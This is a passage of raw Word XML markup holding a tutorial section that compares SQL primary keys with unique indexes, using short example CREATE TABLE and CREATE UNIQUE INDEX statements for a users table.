          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Referential Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Primary keys are often used in conjunction with foreign keys in other tables to maintain referential integrity across the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306AD61F" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>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216B0E71" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54"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CREATE TABLE users (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315BB73" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54"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user_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4FFAD" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54"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username VARCHAR(50),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07913B9C" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54"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email VARCHAR(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A88624" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012F154F" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, user_id is the primary key, ensuring each user has a unique, non-null identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06511F57" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unique Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712C0374" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D5CFA" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A unique index ensures that the values in one or more columns are unique across all rows in a table. Unlike a primary key, a table can have multiple unique indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34C9B3" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A9A91" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures all values in the indexed columns are unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B786B8A" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nullable</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Unique indexes can be defined on columns that allow NULLs. However, depending on the database system, multiple NULLs may be allowed in the column(s) because NULL is not considered a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2762E" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Multiple Per Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table can have more than one unique index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703CB5E0" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Custom Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Unique indexes are often used to enforce uniqueness on columns that are not intended to be the primary identifier of a row, such as an email address or username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A332E" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>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5493387" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54"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CREATE UNIQUE INDEX idx_unique_email ON users(email);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144AC5EB" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This unique index ensures that the email column in the users table does not have duplicate values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397963A" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396AD7FB" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC98C4" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Both primary keys and unique indexes enforce uniqueness, but a primary key also enforces non-nullability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD7636" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nullability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9CDBBE" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Primary Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Cannot contain NULL values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A6F7F8" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Can contain NULL values, but depending on the database system, multiple NULLs may be allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83A6F5" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Number Per Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A8D1E2" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Primary Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table can only have one primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42888C84" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table can have multiple unique indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B836D63" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0822BD" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Primary Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used as the main identifier of a row and often as a target for foreign keys in other tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F299A34" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Used to enforce uniqueness on non-primary key columns, such as email addresses or usernames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0DAC29" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automatic Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699270B1" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When a primary key is defined, a unique index is automatically created by the database. However, a unique index does not automatically imply that it is a primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA214D" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When to Use Each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC4922" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
